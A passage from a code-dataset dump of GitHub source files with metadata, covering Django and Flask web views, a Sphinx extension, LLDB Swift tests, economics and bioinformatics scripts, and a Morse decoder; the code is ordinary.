redirect(reverse('view_cart'))\n","repo_name":"JayPeaa/msproject5","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25740928967","text":"import logging\nimport datetime\nfrom api.admin.handlers.login import AdminBaseHandler\nfrom api.users.models import User, SystemStatus\nfrom api.users.reported_users.models import UserReportingReasons, ReportedUsers\nfrom base import HttpRedirect\nfrom helpers import route\n\n__author__ = 'ne_luboff'\n\nlogger = logging.getLogger(__name__)\n\n\n@route('admin/users/reported')\nclass AdminReportedUsersHandler(AdminBaseHandler):\n allowed_methods = ('GET', 'DELETE')\n\n def read(self):\n if not self.user:\n return HttpRedirect('/api/admin/login')\n\n logger.debug(self.user)\n # first get all info from blocked user table\n\n reported_users = self.session.query(ReportedUsers).order_by(ReportedUsers.id)\n\n blocked_users_count = 0\n blocked_users_count_query = self.session.execute(\"\"\"SELECT count(*) as ca FROM user_blacklist;\"\"\")\n for b in blocked_users_count_query:\n blocked_users_count = b.ca\n\n suspended_users_count = self.session.query(User).filter(User.system_status == SystemStatus.Suspended).count()\n\n return self.render_string('admin/users/admin_reported_users.html', reported_users=reported_users,\n menu_tab_active='tab_users', blocked_users_count=blocked_users_count,\n UserReportingReasons=UserReportingReasons, timedelta=datetime.timedelta,\n 
suspended_users_count=suspended_users_count)","repo_name":"Innoventional/hawkistBE","sub_path":"api/admin/handlers/users/reported_users.py","file_name":"reported_users.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72062741950","text":"\"\"\"\nExcel to csv.\n\nMakes a csv from excel files.\n\"\"\"\n\nfrom utils import Utils\n\nenv_vars = '../.env'\n\nutils = Utils(env_vars)\n\nutils.iterate_serial(\"./data/clean\",\n \"./data/search\",\n \"./data\",\n utils.add_search)\n","repo_name":"sachiniyer/invoice-categorization","sub_path":"model/process_data/add_search.py","file_name":"add_search.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36433377615","text":"import docutils\nfrom sphinx.application import Sphinx\nfrom sphinx.writers.html import HTMLTranslator\nfrom sphinx.writers.html5 import HTML5Translator\n\n# this package\nfrom sphinx_toolbox.utils import SphinxExtMetadata, metadata_add_version\n\n__all__ = [\"setup\"]\n\n\ndef visit_footnote(self: HTMLTranslator, node: docutils.nodes.footnote) -> None: # pragma: no cover\n\tif not self.in_footnote_list:\n\t\tlistnode = node.copy()\n\t\tlistnode[\"ids\"] = []\n\t\tclasses = [node.tagname, self.settings.footnote_references]\n\t\tself.body.append(self.starttag(listnode, \"dl\", CLASS=' '.join(classes))) # role=\"note\"\n\t\tself.in_footnote_list = True\n\n\ndef depart_footnote(self, node: docutils.nodes.footnote) -> None: # pragma: no cover\n\tself.body.append('\\n')\n\tif not isinstance(node.next_node(descend=False, siblings=True), docutils.nodes.footnote):\n\t\tself.body.append('\\n')\n\t\tself.in_footnote_list = False\n\n\ndef visit_footnote_reference(self, node: docutils.nodes.footnote_reference) -> None: # pragma: no cover\n\thref = '#' + node[\"refid\"]\n\tclasses = [\"footnote-reference\", self.settings.footnote_references]\n\tself.body.append(self.starttag(node, 'a', suffix='', CLASS=' '.join(classes), href=href)) # role='doc-noteref'\n\n\ndef depart_footnote_reference(self, node: docutils.nodes.footnote_reference) -> None: # pragma: no cover\n\tself.body.append(\"\")\n\n\n# footnote and citation labels:\ndef visit_label(self, node: docutils.nodes.label) -> None: # pragma: no cover\n\tif (isinstance(node.parent, docutils.nodes.footnote)):\n\t\tclasses = self.settings.footnote_references\n\telse:\n\t\tclasses = \"brackets\"\n\n\t# pass parent node to get id into starttag:\n\tself.body.append(self.starttag(node.parent, \"dt\", '', CLASS=\"label\"))\n\tself.body.append(self.starttag(node, \"span\", '', CLASS=classes))\n\n\t# footnote/citation backrefs:\n\tif self.settings.footnote_backlinks:\n\t\tbackrefs = node.parent.get(\"backrefs\", [])\n\t\tif len(backrefs) == 1:\n\t\t\tself.body.append('' % backrefs[0])\n\n\ndef depart_label(self, node: docutils.nodes.label) -> None: # pragma: no cover\n\tif self.settings.footnote_backlinks:\n\t\tbackrefs = node.parent[\"backrefs\"]\n\t\tif len(backrefs) == 1:\n\t\t\tself.body.append(\"\")\n\tself.body.append(\"\")\n\tif self.settings.footnote_backlinks and len(backrefs) > 1:\n\t\tbacklinks = [f'{i}' for (i, ref) in enumerate(backrefs, 1)]\n\t\tself.body.append('(%s)' % ','.join(backlinks))\n\tself.body.append('\\n
')\n\n\n@metadata_add_version\ndef setup(app: Sphinx) -> SphinxExtMetadata:\n\t\"\"\"\n\tSetup :mod:`sphinx_toolbox.tweaks.revert_footnote_style`.\n\n\t:param app: The Sphinx application.\n\t\"\"\"\n\n\tif docutils.__version_info__ >= (0, 18): # pragma: no cover\n\t\tapp.add_node(\n\t\t\t\tdocutils.nodes.footnote,\n\t\t\t\thtml=(visit_footnote, depart_footnote),\n\t\t\t\toverride=True,\n\t\t\t\t)\n\t\tapp.add_node(\n\t\t\t\tdocutils.nodes.footnote_reference,\n\t\t\t\thtml=(visit_footnote_reference, depart_footnote_reference),\n\t\t\t\toverride=True,\n\t\t\t\t)\n\t\tapp.add_node(\n\t\t\t\tdocutils.nodes.label,\n\t\t\t\thtml=(visit_label, depart_label),\n\t\t\t\toverride=True,\n\t\t\t\t)\n\t\tHTMLTranslator.in_footnote_list = False\n\t\tHTML5Translator.in_footnote_list = False\n\n\treturn {\"parallel_read_safe\": True}\n","repo_name":"sphinx-toolbox/sphinx-toolbox","sub_path":"sphinx_toolbox/tweaks/revert_footnote_style.py","file_name":"revert_footnote_style.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"60"} +{"seq_id":"7411209782","text":"import subprocess\nimport lldb\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test.decorators import *\nimport lldbsuite.test.lldbutil as lldbutil\nimport os\nimport os.path\nimport platform\nimport unittest2\nfrom lldbsuite.test.builders.darwin import get_triple\n\nimport sys\n\nif sys.version_info.major == 2:\n import commands as subprocess\nelse:\n import subprocess\n\n\ndef execute_command(command):\n (exit_status, output) = subprocess.getstatusoutput(command)\n return exit_status\n\n\nclass TestSwiftPlaygrounds(TestBase):\n mydir = TestBase.compute_mydir(__file__)\n\n def get_build_triple(self):\n \"\"\"We want to build the file with a deployment target earlier than the\n availability set in the source file.\"\"\"\n if lldb.remote_platform:\n arch = self.getArchitecture()\n vendor, os, version, _ = get_triple()\n # This is made slightly more complex by watchOS having misaligned\n # version numbers.\n if os == \"watchos\":\n version = \"5.0\"\n else:\n version = \"7.0\"\n triple = \"{}-{}-{}{}\".format(arch, vendor, os, version)\n else:\n triple = \"{}-apple-macosx11.0\".format(platform.machine())\n return triple\n\n def get_run_triple(self):\n if lldb.remote_platform:\n arch = self.getArchitecture()\n vendor, os, version, _ = get_triple()\n triple = \"{}-{}-{}{}\".format(arch, vendor, os, version)\n else:\n version, _, machine = platform.mac_ver()\n triple = \"{}-apple-macosx{}\".format(machine, version)\n return triple\n\n @skipUnlessDarwin\n @swiftTest\n @skipIf(setting=(\"symbols.use-swift-clangimporter\", \"false\"))\n @skipIf(debug_info=decorators.no_match(\"dsym\"))\n def test_force_target(self):\n \"\"\"Test that playgrounds work\"\"\"\n self.launch(True)\n self.do_basic_test(True)\n\n @skipUnlessDarwin\n @swiftTest\n @skipIf(setting=(\"symbols.use-swift-clangimporter\", \"false\"))\n @skipIf(debug_info=decorators.no_match(\"dsym\"))\n def test_no_force_target(self):\n \"\"\"Test that playgrounds work\"\"\"\n self.launch(False)\n self.do_basic_test(False)\n\n @skipUnlessDarwin\n @swiftTest\n @skipIf(setting=(\"symbols.use-swift-clangimporter\", \"false\"))\n @skipIf(debug_info=decorators.no_match(\"dsym\"))\n @skipIf(macos_version=[\"<\", \"12\"])\n def test_concurrency(self):\n \"\"\"Test that concurrency is available in playgrounds\"\"\"\n self.launch(True)\n self.do_concurrency_test()\n\n @skipUnlessDarwin\n @swiftTest\n 
@skipIf(setting=(\"symbols.use-swift-clangimporter\", \"false\"))\n @skipIf(debug_info=decorators.no_match(\"dsym\"))\n def test_import(self):\n \"\"\"Test that a dylib can be imported in playgrounds\"\"\"\n self.launch(True)\n self.do_import_test()\n\n def launch(self, force_target):\n \"\"\"Test that playgrounds work\"\"\"\n self.build(\n dictionary={\n \"TARGET_SWIFTFLAGS\": \"-target {}\".format(self.get_build_triple()),\n }\n )\n\n # Create the target\n exe = self.getBuildArtifact(\"PlaygroundStub\")\n if force_target:\n target = self.dbg.CreateTargetWithFileAndArch(exe, self.get_run_triple())\n else:\n target = self.dbg.CreateTarget(exe)\n\n self.assertTrue(target, VALID_TARGET)\n self.registerSharedLibrariesWithTarget(target, [\"libPlaygroundsRuntime.dylib\"])\n\n # Set the breakpoints\n breakpoint = target.BreakpointCreateBySourceRegex(\n \"Set breakpoint here\", lldb.SBFileSpec(\"PlaygroundStub.swift\")\n )\n self.assertTrue(breakpoint.GetNumLocations() > 0, VALID_BREAKPOINT)\n\n process = target.LaunchSimple(None, None, os.getcwd())\n self.assertTrue(process, PROCESS_IS_VALID)\n\n threads = lldbutil.get_threads_stopped_at_breakpoint(process, breakpoint)\n\n self.assertEqual(len(threads), 1)\n self.expect(\n 'settings set target.swift-framework-search-paths \"%s\"' % self.getBuildDir()\n )\n\n self.options = lldb.SBExpressionOptions()\n self.options.SetLanguage(lldb.eLanguageTypeSwift)\n self.options.SetPlaygroundTransformEnabled()\n # The concurrency expressions will spawn multiple threads.\n self.options.SetOneThreadTimeoutInMicroSeconds(1)\n self.options.SetTryAllThreads(True)\n\n def execute_code(self, input_file, expect_error=False):\n contents = \"syntax error\"\n with open(input_file, \"r\") as contents_file:\n contents = contents_file.read()\n res = self.frame().EvaluateExpression(contents, self.options)\n ret = self.frame().EvaluateExpression(\"get_output()\")\n is_error = res.GetError().Fail() and not (\n res.GetError().GetType() == 1 and res.GetError().GetError() == 0x1001\n )\n playground_output = ret.GetSummary()\n with recording(self, self.TraceOn()) as sbuf:\n print(\"playground result: \", file=sbuf)\n print(str(res), file=sbuf)\n if is_error:\n print(\"error:\", file=sbuf)\n print(str(res.GetError()), file=sbuf)\n else:\n print(\"playground output:\", file=sbuf)\n print(str(ret), file=sbuf)\n\n if expect_error:\n self.assertTrue(is_error)\n return playground_output\n self.assertFalse(is_error)\n self.assertIsNotNone(playground_output)\n return playground_output\n\n def do_basic_test(self, force_target):\n playground_output = self.execute_code(\"Contents.swift\", not force_target)\n if not force_target:\n # This is expected to fail because the deployment target\n # is less than the availability of the function being\n # called.\n self.assertEqual(playground_output, '\"\"')\n return\n\n self.assertIn(\"a=\\\\'3\\\\'\", playground_output)\n self.assertIn(\"b=\\\\'5\\\\'\", playground_output)\n self.assertIn(\"=\\\\'8\\\\'\", playground_output)\n self.assertIn(\"=\\\\'11\\\\'\", playground_output)\n\n def do_concurrency_test(self):\n playground_output = self.execute_code(\"Concurrency.swift\")\n self.assertIn(\"=\\\\'23\\\\'\", playground_output)\n\n def do_import_test(self):\n # Test importing a library that adds new Clang options.\n log = self.getBuildArtifact(\"types.log\")\n self.expect(\"log enable lldb types -f \" + log)\n playground_output = self.execute_code(\"Import.swift\")\n self.assertIn(\"Hello from the Dylib\", playground_output)\n\n # Scan through the 
types log to make sure the SwiftASTContext was poisoned.\n import io\n\n logfile = io.open(log, \"r\", encoding=\"utf-8\")\n found = 0\n for line in logfile:\n if (\n \"New Swift image added\" in line\n and \"Versions/A/Dylib\" in line\n and \"ClangImporter needs to be reinitialized\" in line\n ):\n found += 1\n self.assertEqual(found, 2)\n","repo_name":"DeNA/DeClang","sub_path":"lldb/test/API/lang/swift/playgrounds/TestSwiftPlaygrounds.py","file_name":"TestSwiftPlaygrounds.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":365,"dataset":"github-code","pt":"60"} +{"seq_id":"4453804955","text":"import scipy.interpolate as interp\nimport quantecon as qe\n\ndef expect_loss_choose_0(p, L0):\n \"For a given probability return expected loss of choosing model 0\"\n return (1 - p) * L0\n\ndef expect_loss_choose_1(p, L1):\n \"For a given probability return expected loss of choosing model 1\"\n return p * L1\n\ndef EJ(p, f0, f1, J):\n \"\"\"\n Evaluates the expectation of our value function J. To do this, we\n need the current probability that model 0 is correct (p), the\n distributions (f0, f1), and the function J.\n \"\"\"\n # Get the current distribution we believe (p*f0 + (1-p)*f1)\n curr_dist = p * f0 + (1 - p) * f1\n \n # Get tomorrow's expected distribution through Bayes law\n tp1_dist = np.clip((p * f0) / (p * f0 + (1 - p) * f1), 0, 1)\n \n # Evaluate the expectation\n EJ = curr_dist @ J(tp1_dist)\n \n return EJ\n\ndef expect_loss_cont(p, c, f0, f1, J):\n return c + EJ(p, f0, f1, J)\n\n\ndef bellman_operator(pgrid, c, f0, f1, L0, L1, J):\n \"\"\"\n Evaluates the value function for a given continuation value\n function; that is, evaluates\n\n J(p) = min((1 - p) L0, p L1, c + E J(p'))\n\n Uses linear interpolation between points.\n \"\"\"\n m = np.size(pgrid)\n assert m == np.size(J)\n \n J_out = np.zeros(m)\n J_interp = interp.UnivariateSpline(pgrid, J, k=1, ext=0)\n\n for (p_ind, p) in enumerate(pgrid):\n # Payoff of choosing model 0\n p_c_0 = expect_loss_choose_0(p, L0)\n p_c_1 = expect_loss_choose_1(p, L1)\n p_con = expect_loss_cont(p, c, f0, f1, J_interp)\n \n J_out[p_ind] = min(p_c_0, p_c_1, p_con)\n\n return J_out\n\n\n# == Now run at given parameters == #\n\n# First set up distributions \np_m1 = np.linspace(0, 1, 50)\nf0 = np.clip(st.beta.pdf(p_m1, a=1, b=1), 1e-8, np.inf)\nf0 = f0 / np.sum(f0)\nf1 = np.clip(st.beta.pdf(p_m1, a=9, b=9), 1e-8, np.inf)\nf1 = f1 / np.sum(f1)\n\n# Build a grid\npg = np.linspace(0, 1, 251)\n# Turn the Bellman operator into a function with one argument\nbell_op = lambda vf: bellman_operator(pg, 0.5, f0, f1, 5.0, 5.0, vf)\n# Pass it to qe's built in iteration routine\nJ = qe.compute_fixed_point(bell_op, \n np.zeros(pg.size), # Initial guess\n error_tol=1e-6, \n verbose=True, \n print_skip=5)\n\n","repo_name":"QuantEcon/lecture-source-py","sub_path":"source/_static/lecture_specific/wald_friedman/wf_first_pass.py","file_name":"wf_first_pass.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"60"} +{"seq_id":"19055063017","text":"#!/usr/bin/env python\n\n# Written by Lukas Heumos and released under MIT license.\n\nimport argparse\nimport logging\nimport pandas as pd\nimport numpy as np\nimport sys\n\nfrom collections import defaultdict\nfrom mhcflurry import Class1AffinityPredictor\n\n# logging setup\nconsole = logging.StreamHandler(sys.stdout)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - 
%(message)s\")\nconsole.setFormatter(formatter)\nLOG = logging.getLogger(\"MHCFlurry Predict mztab\")\nLOG.addHandler(console)\nLOG.setLevel(logging.INFO)\n\n\ndef parse_mztab(identified_peptides_file):\n \"\"\"\n parses an mztab file and returns all identified proteins\n :param identified_peptides_file: path to the mztab file\n :return: identified proteins\n \"\"\"\n mztab = open(identified_peptides_file)\n mztab_read = mztab.readlines()\n mztab.close()\n\n seq_geneIDs = defaultdict(str)\n for line in mztab_read:\n if line.startswith(\"PEP\"):\n content = line.split(\"\\t\")\n seq = content[1]\n geneID = content[2]\n if not \"U\" in seq and not \"X\" in seq and not \"Z\" in seq and not \"J\" in seq and not \"B\" in seq:\n seq_geneIDs[seq] = geneID\n\n return seq_geneIDs\n\n\n# List of alleles supported by mhcflurry\nsupported_alleles = (\n \"A*01:01,A*02:01,A*02:02,A*02:03,A*02:05,A*02:06,A*02:07,A*02:11,A*02:12,A*02:16,A*02:17,A*02:19,\"\n \"A*02:50,A*03:01,A*11:01,A*23:01,A*24:02,A*24:03,A*25:01,A*26:01,A*26:02,A*26:03,A*29:02,A*30:01,\"\n \"A*30:02,A*31:01,A*32:01,A*33:01,A*66:01,A*68:01,A*68:02,A*68:23,A*69:01,A*80:01,B*07:01,B*07:02,\"\n \"B*08:01,B*08:02,B*08:03,B*14:02,B*15:01,B*15:02,B*15:03,B*15:09,B*15:17,B*18:01,B*27:02,B*27:03,\"\n \"B*27:04,B*27:05,B*27:06,B*35:01,B*35:03,B*37:01,B*38:01,B*39:01,B*39:06,B*40:01,B*40:02,B*42:01,\"\n \"B*44:02,B*44:03,B*45:01,B*46:01,B*48:01,B*51:01,B*53:01,B*54:01,B*57:01,B*58:01,B*83:01,C*03:03,\"\n \"C*04:01,C*05:01,C*06:02,C*07:02,C*08:02,C*12:03,C*14:02,C*15:02\".split(\",\")\n)\n\n# read provided allotypes\nalleles = sys.argv[-3].split(\";\")\n\n# extract and verify alleles\nunsupported_alleles = [a for a in alleles if a not in supported_alleles]\nalleles = [a for a in alleles if a in supported_alleles]\n\nif unsupported_alleles:\n for allele in unsupported_alleles:\n LOG.warning(\"Allele: \" + allele + \" is not supported by MHCFlurry!\")\nif not alleles:\n LOG.warning(\"Submitted alleles are not supported or formatting of input.tsv is not correct!\")\n\n# read identified peptides\nseqs_to_geneID = parse_mztab(sys.argv[-2])\n\nif len(seqs_to_geneID) > 0:\n # call mhcflurry\n for allele in alleles:\n predictor = Class1AffinityPredictor.load()\n df_pred = predictor.predict_to_dataframe(allele=allele, peptides=seqs_to_geneID.keys())\n df_pred.insert(1, \"geneID\", pd.Series(np.array(seqs_to_geneID.values())))\n df_pred.to_csv(allele + \"_\" + sys.argv[-1])\nelse:\n op = open(sys.argv[-1], \"w\")\n op.close()\n","repo_name":"nf-core/mhcquant","sub_path":"bin/mhcflurry_predict_mztab.py","file_name":"mhcflurry_predict_mztab.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"60"} +{"seq_id":"15491108982","text":"from scipy.constants import Rydberg\n\n\ndef main():\n R = Rydberg * 1e-9\n arr = []\n for m in range(1, 4):\n arr.append([])\n print(f\"\\nSeries for m = {m}\")\n for n in range(m + 1, m + 6):\n arr[m - 1].append(1 / (R * (1 / m**2 - 1 / n**2)))\n print(*map(lambda x: f\"\\t{x:.2f} nm\", arr[m - 1]), sep=\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kvdomingo/AP155","sub_path":"ch02/emissions.py","file_name":"emissions.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21370709162","text":"import os\nimport re\nfrom morseDict import morse\n\n# reading file that has message to be encoded\nhere = 
os.path.dirname(os.path.abspath(__file__))\n# decoding part, opeing file\nclass decodeMorse():\n def decodePrep(fileInput):\n filename = os.path.join(here, fileInput)\n file = open(filename, 'r')\n content = file.read()\n \n morseTxt = re.split('([,|\\n])', content) \n #the line above seperates the string with seperators ',' or '\\n' in this case\n noC = list(filter(lambda a: a != ',', morseTxt)) #removes ',', since not needed\n new=[]\n l=0\n #checks if it is a possible morse\n for i in noC:\n if [list(noC[l])] in morse.values():\n new.append([list(noC[l])])\n else:\n new.append(noC[l])\n l+=1\n \n return decodeMorse.decode(new)\n # decoding function\n def decode(data):\n encodedWord = ''\n for letter in data:\n if letter in morse.values():#checks if letter is in the values\n indexL=list(morse.values()).index(letter) #index of matching value\n encodedLetter = list(morse.keys())[indexL] #key of index obtained above\n encodedWord += encodedLetter\n else: #in the event of a \\n, , ect, it will be added into the decoded message here\n encodedWord += str(letter)\n return encodedWord\n","repo_name":"joshhuasg/datastructuresandalgo","sub_path":"CA1/CA1_JoshuaYap_2011857_2b03/printsLetter.py","file_name":"printsLetter.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5915408311","text":"import pytest\n\nfrom _appmap import testing_framework, wrapt\nfrom _appmap.env import Env\n\nlogger = Env.current.getLogger(__name__)\n\n\nclass recorded_testcase: # pylint: disable=too-few-public-methods\n def __init__(self, item):\n self.item = item\n\n @wrapt.decorator\n def __call__(self, wrapped, _, args, kwargs):\n item = self.item\n with item.session.appmap.record(\n item.cls, item.name, method_id=item.originalname, location=item.location\n ) as metadata:\n with testing_framework.collect_result_metadata(metadata):\n return wrapped(*args, **kwargs)\n\n\nif not Env.current.is_appmap_repo and Env.current.enables(\"pytest\"):\n logger.debug(\"Test recording is enabled (Pytest)\")\n\n @pytest.hookimpl\n def pytest_sessionstart(session):\n session.appmap = testing_framework.session(\n name=\"pytest\", recorder_type=\"tests\", version=pytest.__version__\n )\n\n @pytest.hookimpl\n def pytest_runtest_call(item):\n # The presence of a `_testcase` attribute on an item indicates\n # that it was created from a `unittest.TestCase`. An item\n # created from a TestCase has an `obj` attribute, assigned\n # during in setup, which holds the actual test\n # function. Wrapping that function will capture the recording\n # we want. `obj` gets unset during teardown, so there's no\n # chance of rewrapping it.\n #\n # However, depending on the user's configuration, `item.obj`\n # may have been already instrumented for recording. In this\n # case, it will be a `wrapt` class, rather than just a\n # function. This is fine: the decorator we apply here will be\n # called first, starting the recording. Next, the\n # instrumentation decorator will be called, recording the\n # `call` event. Finally, the original function will be called,\n # running the test case. 
(This nesting of function calls is\n # verified by the expected appmap in the test for a unittest\n # TestCase run by pytest.)\n if hasattr(item, \"_testcase\"):\n setattr(\n item._testcase, # pylint: disable=protected-access\n \"_appmap_pytest_recording\",\n True,\n )\n item.obj = recorded_testcase(item)(item.obj)\n\n @pytest.hookimpl(hookwrapper=True)\n def pytest_pyfunc_call(pyfuncitem):\n # There definitely shouldn't be a `_testcase` attribute on a\n # pytest test.\n assert not hasattr(pyfuncitem, \"_testcase\")\n\n with pyfuncitem.session.appmap.record(\n pyfuncitem.cls,\n pyfuncitem.name,\n method_id=pyfuncitem.originalname,\n location=pyfuncitem.location,\n ) as metadata:\n result = yield\n try:\n with testing_framework.collect_result_metadata(metadata):\n result.get_result()\n except: # pylint: disable=bare-except\n pass # exception got recorded in metadata\n","repo_name":"getappmap/appmap-python","sub_path":"appmap/pytest.py","file_name":"pytest.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":80,"dataset":"github-code","pt":"60"} +{"seq_id":"73582535230","text":"# -*- coding: utf-8 -*-\n\"\"\"This module contains SQLModel's models.\"\"\"\nimport datetime\nimport typing\n\nfrom pydantic import HttpUrl\nfrom sqlmodel import SQLModel\n\nFakeJSON = typing.Dict[str, typing.Any]\n\n\nclass TextStatisticsJSON(SQLModel):\n # basic\n n_chars: int\n n_letters: int\n n_words: int\n n_long_words: int\n n_complex_words: int\n n_simple_words: int\n n_unique_words: int\n n_syllables: int\n n_monosyllable_words: int\n n_polysyllable_words: int\n # readability\n automated_readability_index: float\n coleman_liau_index: float\n flesch_kincaid_grade: float\n flesch_reading_easy: float\n lix: float\n smog_index: float\n # diversity\n ttr: float\n rttr: float\n cttr: float\n sttr: float\n mttr: float\n dttr: float\n mattr: float\n msttr: float\n mtld: float\n mamtld: float\n hdd: float\n simpson_index: float\n hapax_index: float\n morphology: FakeJSON\n\n\nclass Sentence(SQLModel):\n document_id: int\n paragraph_id: int\n sentence_id: int\n speaker: typing.Optional[str] = None\n text: str\n text_lemmatized: str\n\n\nclass Theme(SQLModel):\n category: str\n theme: str\n\n\nclass Document(SQLModel):\n id: int\n title: str\n date: datetime.date\n url: HttpUrl\n sentences: typing.List[Sentence]\n themes: typing.Optional[typing.List[Theme]] = None\n\n\nclass RedLines(SQLModel):\n model_language: str\n model_name: str\n model_type: typing.Optional[str] = None\n model_version: str\n model_performance: typing.Optional[str] = None\n\n prediction: float\n\n\nclass Embeddings(SQLModel):\n model_language: str\n model_name: str\n vector: typing.List[float]\n\n\nclass Sentiment(SQLModel):\n model_name: str\n tokenizer_name: str\n prediction: float\n prediction_label: str\n","repo_name":"hp0404/speeches","sub_path":"app/schemas/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"19420607278","text":"import random\nfrom flask import Blueprint, render_template, url_for, redirect, request, flash\nfrom flask_login import current_user, login_required, login_user, logout_user\nimport uuid\nfrom ..models import Playlist, User\nfrom ..forms import SearchForm, PlaylistMetadataForm, PlaylistSongForm\nfrom ..client import SongClient\nplaylists = Blueprint('playlists', __name__)\n\n@playlists.route('/', methods=['GET', 'POST'])\ndef 
index():\n form = SearchForm()\n if form.validate_on_submit():\n return redirect(url_for('playlists.search', query=form.search_query.data))\n \n #get top 10 playlists\n playlists = Playlist.objects.order_by('-likes').limit(10)\n\n\n \n\n\n return render_template('index.html', title=\"Home\", form=form, playlists=playlists)\n\n#create playlist\n@login_required\n@playlists.route('/create', methods=['GET', 'POST'])\ndef create():\n #check if user is logged in\n if not current_user.is_authenticated:\n flash('You must be logged in to create a playlist', 'danger')\n return redirect(url_for('user.login'))\n else:\n form = PlaylistMetadataForm()\n if form.validate_on_submit():\n playlist = Playlist(name=form.name.data, description=form.description.data, owner=current_user._get_current_object(), uuid=str(uuid.uuid4()), songs=[])\n print(playlist.owner)\n playlist.save()\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n\n return render_template('create.html', title=\"Create Playlist\", form=form)\n\n@playlists.route('/edit/', methods=['GET', 'POST'])\ndef edit(uuid):\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is None or playlist.owner != current_user._get_current_object():\n flash('You do not have permission to edit this playlist', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n playForm = PlaylistSongForm()\n if playForm.validate_on_submit():\n song = SongClient().get_track(playForm.artist.data, playForm.song.data)\n \n try:\n song.mbid\n \n return redirect(url_for('playlists.addSong', uuid=playlist.uuid, mbid=song.mbid))\n except:\n flash('Song not found', 'danger')\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n\n form = PlaylistMetadataForm()\n if form.validate_on_submit():\n playlist.name = form.name.data\n playlist.description = form.description.data\n playlist.save()\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n else:\n form.name.data = playlist.name\n form.description.data = playlist.description\n\n \n \n \n songs = []\n\n for mbid in playlist.songs:\n songs.append(SongClient().get_track_by_mbid(mbid))\n\n numSongs = 16 // ( len(songs) + 1)\n \n top = []\n for song in songs:\n top.extend(SongClient().get_topN_tracks(numSongs, song.artist))\n \n random.shuffle(top)\n\n \n\n\n \n\n\n\n return render_template('edit.html', title=\"Edit Playlist\", form=form, playForm = playForm, songs=songs, playlist=playlist, top15=top)\n\n@playlists.route('/delete/', methods=['GET', 'POST'])\ndef delete(uuid):\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is not None:\n if playlist.owner == current_user._get_current_object():\n playlist.delete()\n flash('Playlist deleted', 'success')\n return redirect(url_for('user.account'))\n else:\n flash('You do not have permission to delete this playlist', 'danger')\n return redirect(url_for('playlists.index'))\n \n else:\n flash('Playlist not found', 'danger')\n return redirect(url_for('user.account'))\n \n@playlists.route('/search/', methods=['GET', 'POST'])\ndef search(query):\n form = SearchForm()\n if form.validate_on_submit():\n return redirect(url_for('playlists.search', query=form.search_query.data))\n\n \n #get all playlists that match query\n playlists = Playlist.objects(name__icontains=query).order_by('-likes')\n\n\n\n\n return render_template('search.html', title=\"Search\", playlists=playlists, query=query, form=form)\n\n@playlists.route('/deleteSong//', methods=['GET', 'POST'])\ndef deleteSong(uuid, mbid):\n playlist = 
Playlist.objects(uuid=uuid).first()\n if playlist is None or playlist.owner != current_user._get_current_object():\n flash('You do not have permission to edit this playlist', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n playlist.songs.remove(mbid)\n playlist.duration -= SongClient().get_track_by_mbid(mbid).duration\n playlist.save()\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n \n\n@playlists.route('/addSong//', methods=['GET', 'POST'])\ndef addSong(uuid, mbid):\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is None or playlist.owner != current_user._get_current_object():\n flash('You do not have permission to edit this playlist', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n playlist.songs.append(mbid)\n playlist.duration += SongClient().get_track_by_mbid(mbid).duration\n playlist.save()\n return redirect(url_for('playlists.edit', uuid=playlist.uuid))\n \n@playlists.route('/view/', methods=['GET', 'POST'])\ndef view(uuid):\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is None:\n flash('Playlist not found', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n song = SongClient().get_track_by_mbid(playlist.songs[0])\n songs = []\n\n for mbid in playlist.songs:\n \n songs.append(SongClient().get_track_by_mbid(mbid))\n\n \n form = SearchForm()\n if form.validate_on_submit():\n return redirect(url_for('playlists.search', query=form.search_query.data))\n \n total_duration = playlist.duration\n \n\n liked = False\n if current_user.is_authenticated:\n if playlist.uuid in current_user.liked_playlists:\n liked = True\n \n\n\n\n \n\n return render_template('view.html', title=\"View Playlist\", playlist=playlist, songs=songs, form=form, total_duration=total_duration, liked=liked)\n \n\n@playlists.route('/like/', methods=['GET', 'POST'])\ndef like(uuid):\n if not current_user.is_authenticated:\n flash('You must be logged in to like a playlist', 'danger')\n return redirect(url_for('user.login'))\n else:\n playlist = Playlist.objects(uuid=uuid).first()\n if playlist is None:\n flash('Playlist not found', 'danger')\n return redirect(url_for('playlists.index'))\n else:\n if playlist.uuid in 